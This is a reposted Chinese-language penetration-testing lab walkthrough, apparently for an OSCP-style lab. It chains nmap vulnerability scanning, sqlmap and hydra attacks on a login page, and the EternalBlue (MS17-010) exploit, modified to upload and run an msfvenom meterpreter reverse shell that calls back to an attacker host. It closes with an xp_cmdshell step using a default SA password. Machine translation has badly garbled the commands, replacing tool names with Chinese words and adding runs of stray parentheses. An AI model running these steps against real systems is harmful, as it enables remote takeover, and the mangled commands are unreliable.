GP-4501TW,GP-4301TW
nmap-T4-a-ss-SV-vv-script vuln-p-open-n-pn10。11 .1 .31-ox 10。11 .1 .31 .可扩展置标语言
xlt proc-o 10.11.1.31.html 10。11 .1 .31 .可扩展置标语言
sqlmap-u http://10。11 .1 .31/log in-off.ASP -data= txt log inid= amdintxtpassword=1 cmd submit=log in -登录
九头蛇。txt-ppass。txt-s 811 .1 .31 http-post-form /log in-off.ASP 3360 txt log inid=^用户^ txt PPP
饭桶克隆https://github.com/worawit/ms17-010/
光盘桌面/ms17-010 /
python checker.py 10.11.1.5
在网络登录中,状态为好表示存在漏洞。
MSF毒液-p windows/米preter/reverse _ tcpl host=10。11 .0 .243 lport=4444-fexe-o/tmp/1。可执行程序的扩展名
打开元数据打印
使用漏洞利用/多重/处理程序
显示有效负载
setpayloadwindows/仪表预测器/反向_ TCP
setlhost10.11.0.243
setlport4444
导出
工作请勿关闭多级闪蒸的控制台
然后返回/MS17-010/文件夹,修改zzz_exploit.py文件中的代码。
leafpadzzz_exploit.py
搜索SMB_PWN(康涅狄格州,arch)
注释行:打印(创建文件c : (pwned.txtonthetarget))。
TID2=SMBConn.connecttree(c$ )。
FID2=SMBConn.createfile(tid2,/pwned.txt )))))))))))))))))))。
SMBConn.closefile(TID2,fid2))。
SMBConn.disconnecttree(tid2))。
取消对这几行的注释。 ((盖) ) ) ) )。
SMB_send_file(SMBconn,/tmp/1.exe , c ,/1.exe ))
service_exec(Conn,rcmd/cc:((1.exe))))))))))))))))))))))))))))))))。
本地氧化钾机器上的1.exe记得打开777权限。否则,无法连接到靶机。
python zzz _ exploit。py 10。11 .1 .5 NetLogon(可删除的netlogon))。
会议验证是否已建立l会话
I1(身份证)链接会话getuidps
如果光盘" \ documentsandsettings \ administrator \ desktop "路径中间有空格,则必须用双引号引起来
cat proof.txt
26 b4cb 0930 a3 e3be 4d a8e 9d 738607427
nmap-p 1433-script=ms-SQL-XP-cmdshell .NSE脚本参数MSSQL。username=sa,MSSQL.password=poiuyt rewew
然后登录桌面查看proof.txt
郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。